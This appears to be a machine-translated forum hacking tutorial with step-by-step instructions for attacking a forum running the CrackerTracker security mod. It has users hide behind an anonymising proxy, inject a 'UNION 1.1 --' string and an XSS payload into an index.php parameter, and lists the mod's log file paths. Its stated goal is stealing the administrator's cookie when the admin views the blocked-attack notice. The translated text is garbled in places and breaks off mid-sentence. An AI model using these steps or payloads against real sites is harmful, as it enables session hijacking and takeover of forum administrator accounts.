[hide=15]
Open your browser go to www.sito_in_questione.com/forum/
Check to see if the mod CrackerTracker is present on the forum ..
Now use a proxy otherwise go into any www.anonymouse.org
After proxati go on www.sito_in_questione.com/forum/index.php?c =
And entered the next following string: UNION 1.1 --
Now to conclude that there simply add the script: '; alert (String.fromCharCode (88,83,83)) / / \'; alert (String.fromCharCode (88,83,83 ))//"; alert ( String.fromCharCode (88,83,83)) / / \ "alert (String.fromCharCode (88,83,83 ))//></ SCRIPT >!--< SCRIPT> alert (String.fromCharCode (88, 83.83)) </ SCRIPT >=&{}
Thus the result is: http://www.sito_in_questione.com/for...ex.php?c=UNION 1.1 - + our xss
Press enter and see the writing
-------------------------------------------------- ------------------------------
-- SECURITY ALERT --
-------------------------------------------------- ------------------------------
The Board has detected Security System, that you wanted to bring bad
Code to this forum or you have tried to exploit something here or maybe
Another attack this Linke.
This attempt was blocked and we logged all information about this.
If you see this message after including a new MOD to your Forum or if
You have reached this site over a normal Forum Link, please contact
The Board Administrator to fix this problem.
-------------------------------------------------- ------------------------------
CBACK CrackerTracker
It has your data in a file lod.txt that it is possible to reach
Andanso up / ctracker / logs / counter.txt "
/ Ctracker / logs / logfile_flood.txt ";
/ Ctracker / logs / logfile_proxy.txt ";
/ Ctracker / logs / logfile_worms.txt ";
This is not that at this moment we are interested we want the cookie dell'admin
? :-D
Now put the case then the admin log in to your notice a new forum blocked Attacks
Then precipiter